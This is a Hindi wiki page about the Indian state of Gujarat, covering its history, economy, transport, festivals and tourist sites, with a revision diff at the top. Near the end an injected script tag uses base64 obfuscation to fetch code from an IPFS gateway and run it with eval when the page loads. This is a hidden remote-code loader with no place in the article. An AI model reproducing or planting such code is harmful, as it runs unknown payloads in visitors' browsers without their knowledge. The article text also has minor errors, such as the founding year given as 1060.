एक्स्प्रेशन त्रुटि: अनपेक्षित उद्गार चिन्ह "१"।

"गुजरात" के अवतरणों में अंतर  

[अनिरीक्षित अवतरण][अनिरीक्षित अवतरण]
छो (Text replace - "आजाद" to "आज़ाद")
पंक्ति ६८: पंक्ति ६८:
 
*राज्य में द्वारका, सोमनाथ, पालीताना के निकट [[शत्रुंजय पहाड़ी]], पावागढ़, अंबाजी भद्रेश्वर, शामलाजी, तरंगा और [[गिरनार]] जैसे धार्मिक स्थलों के अलावा [[महात्मा गाँधी]] की जन्मभूमि पोरबंदर तथा पुरातत्त्व और वास्तुकला की दृष्टि से उल्लेखनीय पाटन, सिद्धपुर, घुरनली, दभेई, बाडनगर, मोधेरा, लाथल और अमहदाबाद जैसे स्थान भी हैं।  
 
*राज्य में द्वारका, सोमनाथ, पालीताना के निकट [[शत्रुंजय पहाड़ी]], पावागढ़, अंबाजी भद्रेश्वर, शामलाजी, तरंगा और [[गिरनार]] जैसे धार्मिक स्थलों के अलावा [[महात्मा गाँधी]] की जन्मभूमि पोरबंदर तथा पुरातत्त्व और वास्तुकला की दृष्टि से उल्लेखनीय पाटन, सिद्धपुर, घुरनली, दभेई, बाडनगर, मोधेरा, लाथल और अमहदाबाद जैसे स्थान भी हैं।  
 
*अहमदपुर मांडती, चारबाड़ उभारत और तीथल के सुंदर समुद्री तट, सतपुड़ा पर्वतीय स्थल, गिर वनों के शेरों का अभयारण्य और कच्छ में जंगली गधों का अभयारण्य भी पर्यटकों के आकर्षण का केंद्र हैं।
 
*अहमदपुर मांडती, चारबाड़ उभारत और तीथल के सुंदर समुद्री तट, सतपुड़ा पर्वतीय स्थल, गिर वनों के शेरों का अभयारण्य और कच्छ में जंगली गधों का अभयारण्य भी पर्यटकों के आकर्षण का केंद्र हैं।
 +
====टेरा====
 +
{{मुख्य|टेरा}}
 +
टेरा गुजरात राज्य के कच्छ शहर के पास स्थित है। यह स्थान अपनी अद्वितीय पारिस्थितिकी और संस्कृति के लिए प्रसिद्ध है। इस प्राचीन क्षेत्र में रामायण की अपनी परम्परा है। यह रामरंध के नाम से जानी जाती है। टेरा के क़िले में कच्छी रामायण (रामरंध) के विभिन्न प्रकरणों को दर्शाते भित्तिचित्र चित्रित हैं।
 +
 
{{प्रचार}}
 
{{प्रचार}}
 
{{लेख प्रगति
 
{{लेख प्रगति

१०:३४, १२ फ़रवरी २०११ का अवतरण

गुजरात
राजधानी गांधीनगर
राजभाषा(एँ) गुजराती भाषा, मराठी भाषा, हिन्दी भाषा
स्थापना 1960/05/01
जनसंख्या 50,671,017
क्षेत्रफल 196024sqkm
भौगोलिक निर्देशांक 23.2167°N 72.6833°E
ज़िले 26
सबसे बड़ा नगर अहमदाबाद
बड़े नगर जूनागढ़, जामनगर, राजकोट, भावनगर, गांधीनगर, वडोदरा
मुख्य ऐतिहासिक स्थल सोमनाथ, गिरनार, पालीताना, पावागढ़
मुख्य पर्यटन स्थल अहमदपुर मांडती, चारबाड़ उभारत, तीथल
लिंग अनुपात 1000:920 ♂/♀
साक्षरता 69.14%
राज्यपाल डॉ. कमला बेनीवाल
मुख्यमंत्री नरेंद्र मोदी
विधानसभा सदस्य 182
बाहरी कड़ियाँ अधिकारिक वेबसाइट
अद्यतन‎
  • गुजरात पश्चिमी भारत का एक प्रान्त है। इसकी उत्तरी-पश्चिमी सीमा पाकिस्तान से लगी है।
  • राजस्थान और मध्य प्रदेश इसके उत्तर एवं उत्तर-पूर्व में स्थित हैं। महाराष्ट्र इसके पूर्व में है। अरब सागर इसकी पश्चिमी-दक्षिणी सीमा बनाता है। इसकी दक्षिणी सीमा पर दादरा एवं नगर-हवेली हैं।
  • इस प्रांत की राजधानी गांधीनगर है। गांधीनगर प्रांत के प्रमुख व्यवसायिक केन्द्र अहमदाबाद के समीप स्थित है। गुजरात का क्षेत्रफल 1,96,077 किलोमीटर है।

नामोत्पत्ति

गुजरात नाम, गुर्जरत्रा से आया है। गुर्जरो का साम्राज्य 6ठीं से 12वीं सदी तक गुर्जरत्रा या गुर्जर-भूमि के नाम से जाना जाता था। गुर्जर एक समुदाय है|[१]प्राचीन महाकवि राजशेखर ने गुर्जरो का सम्बन्ध सूर्यवंश या रघुवंश से बताया है।[२]कुछ विद्वान इन्हें मध्य-एशिया से आये आर्य भी बताते है।

इतिहास और भूगोल

गुजरात का इतिहास ईस्वी पूर्व लगभग 2,000 साल पुराना है। यह भी मान्यता है कि भगवान कृष्ण मथुरा छोड़कर सौराष्ट्र के पश्चिमी तट पर जा बसे थे, जो द्वारिका अर्थात 'प्रवेशद्वार' कहलाया। बाद के वर्षों में मौर्य, गुप्त, प्रतिहार तथा अन्य अनेक राजवंशों ने इस प्रदेश पर शासन किया। चालुक्य, सोलंकी राजाओं का शासन काल गुजरात के लिए प्रगति और समृध्दि का युग था। महमूद ग़ज़नवी की लूटपाट के बाद भी चालुक्य राजाओं ने यहाँ के लोगों की समृद्धि और भलाई का पूरा ध्यान रखा। इस गौरवपूर्ण काल के पश्चात गुजरात को मुसलमानों, मराठों और ब्रिटिश शासन के दौरान बुरे दिनों का सामना करना पड़ा। आज़ादी से पहले आज का गुजरात मुख्य रूप से दो भागों में विभाजित था-

द्वारिकाधीश मन्दिर, द्वारका, गुजरात
Dwarkadhish Temple, Dwarka, Gujarat
  1. एक ब्रिटिश क्षेत्र और
  2. दूसरा देसी रियासतें।

राज्यों के पुनर्गठन के कारण सौराष्ट्र के राज्यों और कच्छ के केंद्र शासित प्रदेश के साथ पूर्व ब्रिटिश गुजरात को मिलाकर द्विभाषी मुंबई राज्य का गठन हुआ। पहली मई, 1060 को वर्तमान गुजरात राज्य अस्तित्व में आया। गुजरात भारत के पश्चिमी तट पर स्थित है। इसके पश्चिम में अरब सागर, उत्तर में पाकिस्तान तथा उत्तर-पूर्वी सीमा पर राजस्थान, दक्षिण-पूर्वी सीमा पर मध्य प्रदेश और दक्षिण में महाराष्ट्र है।

कृषि

  • गुजरात कपास, तंबाकू और मूंगफली का उत्पादन करने वाला देश का प्रमुख राज्य है।
  • यह कपड़ा, तेल और साबुन जैसे महत्त्वपूर्ण अद्योगों के लिए कच्चा माल उपलब्ध करता है।
  • अन्य महत्त्वपूर्ण नकदी फ़सलें हैं - इसबगोल, धान, गेहूँ और बाजरा।
  • गुजरात के वनों में उपलब्ध वृक्षों की जातियां हैं- सागवान, खैर, हलदरियो, सादाद और बांस।

उद्योग

राज्य के औद्योगिक ढांचे में धीरे-धीरे विविधता आती जा रही है। यहाँ रसायन,पेट्रो-रसायन, उर्वरक, इंजीनियरिंग, इलेक्ट्रॉनिक्स आदि उद्योगों का विकास रहा है।

  • 2004 के अंत में राज्य में पंजीकृत फैक्टरियों की संख्या 21,536 (अस्थाई) थी जिनमें औसतन 9.27 लाख दैनिक मजदूरों को रोजगार मिला हुआ था।
  • मार्च, 2005 तक राज्य में 2.99 लाख लघु औद्योगिक इकाइयों का पंजीकरण हो चुका था।
  • गुजरात औद्योगिक विकास निगम को ढांचागत सुविधाओं के साथ औद्योगिक संपदाओं के विकास की भूमिका सौंपी गई है। *दिसंबर, 2005 तक गुजरात औद्योगिक विकास निगम ने 237 औद्योगिक संपदाएं स्थापित की थी।

सिंचाई और बिजली

  • राज्य में भूतलीय जल तथा भूमिगत जल द्वारा कुल सिंचाई क्षमता 64.48 लाख हेक्टेयर आंकी गई है जिसमें सरदार सरोवर (नर्मदा) परियोजना की 17.92 लाख हेक्टेयर क्षमता भी शामिल है।
  • राज्य में जून 2005 तक कुल सिंचाई क्षमता 40.34 लाख हेक्टेयर क्षमता भी शामिल है।
  • राज्य में जून 2007 तक कुल सिंचाई क्षमता 42.26 लाख हेक्टेयर तक पहुंच गई थी।
  • जून 2007 तक अधिकतम उपयोग क्षतमा 37.33 लाख हेक्टेयर आंकी गई।
गरबा नृत्य, गुजरात
Garba-Dance., Gujarat

परिवहन

  • 2005-06 के अंत में सड़कों की कुल लंबाई (गैर योजना, सामुदायिक, शहरी और परियोजना सड़कों के अलावा) लगभग 74,038 किलोमीटर थी।
  • राज्य के अहमदाबाद स्थित मुख्य हवाई अड्डे से मुंबई, दिल्ली और अन्य शहरों के लिए दैनिक विमान सेवा उपलब्ध है। अहमदाबाद हवाई अड्डे को अब अंतरराष्ट्रीय हवाई अड्डे का दर्जा मिल गया हैं। अन्य हवाई अड्डे वडोदरा, भावनगर, भुज, सूरत, जामनगर, कांदला, केशोद, पोरबंदर और राजकोट में है।
  • गुजरात में कुल 40 बंदरगाह हैं। कांदला राज्य का प्रमुख बंदरगाह है। वर्ष 2004-05 के दौरान गुजरात के मंझोले और छोटे बंदरगाहों से कुल 971.28 लाख टन माल ढोया गया जबकि कांदला बंदरगाह से 415.51 लाख टन माल ढोया गया।

त्योहार

नंगेश्वर महादेव, द्वारका, गुजरात
Nageshwar Mahadev, Dwarka, Gujarat
  • भाद्रपद्र (अगस्त-सितंबर) मास के शुक्ल पक्ष में चतुर्थी, पंचमी और षष्ठी के दिन तरणेतर गांव में भगवान शिव की स्तुति में तरणेतर मेला लगता है।
  • भगवान कृष्ण द्वारा रुक्मणी से विवाह के उपलक्ष्य में चैत्र (मार्च-अप्रैल) के शुक्ल पक्ष की नवमी को पोरबंदर के पास माधवपुर में माधवराय मेला लगता है।
  • उत्तरी गुजरात के बांसकांठा ज़िले में हर वर्ष मां अंबा को समर्पित अंबा जी मेला आयेजित किया जाता हैं।
  • राज्य का सबसे बड़ा वार्षिक मेला द्वारका और डाकोर में भगवान कृष्ण के जन्मदिवस जन्माष्टमी के अवसर पर बड़े हर्षोल्लास से आयोजित होता है।
  • इसके अतिरिक्त गुजरात में मकर संक्राति, नवरात्र, डांगी दरबार, शामला जी मेले तथा भावनाथ मेले का भी आयोजन किया जाता हैं।

पर्यटन स्थल

  • गिर के जंगल में लायन सेंक्चुरी स्थित है।
  • सोमनाथ मंदिर भी स्थित है।
  • राज्य में द्वारका, सोमनाथ, पालीताना के निकट शत्रुंजय पहाड़ी, पावागढ़, अंबाजी भद्रेश्वर, शामलाजी, तरंगा और गिरनार जैसे धार्मिक स्थलों के अलावा महात्मा गाँधी की जन्मभूमि पोरबंदर तथा पुरातत्त्व और वास्तुकला की दृष्टि से उल्लेखनीय पाटन, सिद्धपुर, घुरनली, दभेई, बाडनगर, मोधेरा, लाथल और अमहदाबाद जैसे स्थान भी हैं।
  • अहमदपुर मांडती, चारबाड़ उभारत और तीथल के सुंदर समुद्री तट, सतपुड़ा पर्वतीय स्थल, गिर वनों के शेरों का अभयारण्य और कच्छ में जंगली गधों का अभयारण्य भी पर्यटकों के आकर्षण का केंद्र हैं।

टेरा

टेरा गुजरात राज्य के कच्छ शहर के पास स्थित है। यह स्थान अपनी अद्वितीय पारिस्थितिकी और संस्कृति के लिए प्रसिद्ध है। इस प्राचीन क्षेत्र में रामायण की अपनी परम्परा है। यह रामरंध के नाम से जानी जाती है। टेरा के क़िले में कच्छी रामायण (रामरंध) के विभिन्न प्रकरणों को दर्शाते भित्तिचित्र चित्रित हैं।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

चित्र वीथिका

बाहरी कड़ियाँ

संदर्भ

  1. Ramesh Chandra Majumdar (1977) The History and Culture of the Indian People: The classical age। Bharatiya Vidya Bhavan।
  2. Devadatta Ramakrishna Bhandarkar (1989) Some aspects of ancient Indian culture। Asian Educational Services। ISBN 8120604571, ISBN 9788120604575।

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

"https://amp.bharatdiscovery.org/w/index.php?title=गुजरात&oldid=118101" से लिया गया